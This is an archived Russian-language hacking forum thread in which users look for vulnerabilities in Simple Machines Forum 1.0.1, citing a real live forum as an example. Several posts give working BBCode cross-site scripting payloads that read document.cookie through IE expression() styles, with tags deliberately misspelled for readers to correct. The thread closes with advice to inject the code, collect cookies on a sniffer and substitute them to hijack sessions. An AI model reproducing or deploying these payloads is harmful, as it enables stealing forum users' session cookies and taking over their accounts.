PDA

Просмотр полной версии : SMF 1.0.1. (Simple Machines Forum)

FST
02.04.2005, 18:59
Ломаю голову уже какой день и никак дыру найти не могу :( Может кто-то уже сталкивался? Вот пример форума (http://forum.tolkien.ru/). Этот форум ломать не обязательно :D
KEZ
02.04.2005, 19:17
Дай мне линк на исходники
fahrenheit
02.04.2005, 19:23
http://www.simplemachines.org/download.php/smf_1-0-3_install.zip
fahrenheit
02.04.2005, 19:26
Чего то и мне ломаку стало интересно поискать уязвимость )
Это же какое счатье потом если найдеш))
KEZ
02.04.2005, 19:55
Мда... ну и форум.
В первыем минуты мне показалось что он сверх-защищеный. (по обилию тегов)

Через 2 минуты я уже выделил две самых простых XSS. Их хватит. Если нет - берите ещё. Я сделаю видео.


[urл=http://a[еmail=s=`]a[/еmail]]a[/urл]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));

[iмg]http://[urл=http://s=`]aaaaa[/urл][/iмg]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));


ВНИМАНИЕ! Чтобы НАШ ФОРУМ не парсил (не зависимо от тега [СODE]) мой код, я НАМЕРЕННО написал URL через Л. И емейл тоже так написал.
ПЕРЕПИШИТЕ САМИ!
Algol
02.04.2005, 19:58
Спаренные теги в правильном исполнении:

http://s.dsa@sa/style=background:url(javascript:alert());
Algol
02.04.2005, 20:01
Через 2 минуты я уже выделил две самых простых XSS.

Кстати, ты зря везде пихаешь знак `.
Ведь он прокатывает только в IE.
Если можно обойтись без него, то лучше его не использовать.
KEZ
02.04.2005, 20:47
Ну... это как сказать.
У меня все правильно. И снифер вставляется. Я проверял.
Расчитано на то что Ie. Сейчас большинство его используют
Так что нельзя назвать мое исполнение неправильным
FST
02.04.2005, 22:59
Мда... ну и форум.
В первыем минуты мне показалось что он сверх-защищеный. (по обилию тегов)

Через 2 минуты я уже выделил две самых простых XSS. Их хватит. Если нет - берите ещё. Я сделаю видео.


[urл=http://a[еmail=s=`]a[/еmail]]a[/urл]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));

[iмg]http://[urл=http://s=`]aaaaa[/urл][/iмg]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));


ВНИМАНИЕ! Чтобы НАШ ФОРУМ не парсил (не зависимо от тега [СODE]) мой код, я НАМЕРЕННО написал URL через Л. И емейл тоже так написал.
ПЕРЕПИШИТЕ САМИ!

Во, да ты дайшь басу :D :D Буду ждать ролик! Респект. Я день потратил и ничего не нашёл :(

Ссылочку на видео не забудь оставить :rolleyes:
FST
06.04.2005, 15:17
Гррр, что-то я видео ролика обещенного не вижу !
KEZ
08.04.2005, 14:36
А зачем ролик? Вставляй код. Жди куки на снифере и подменяй.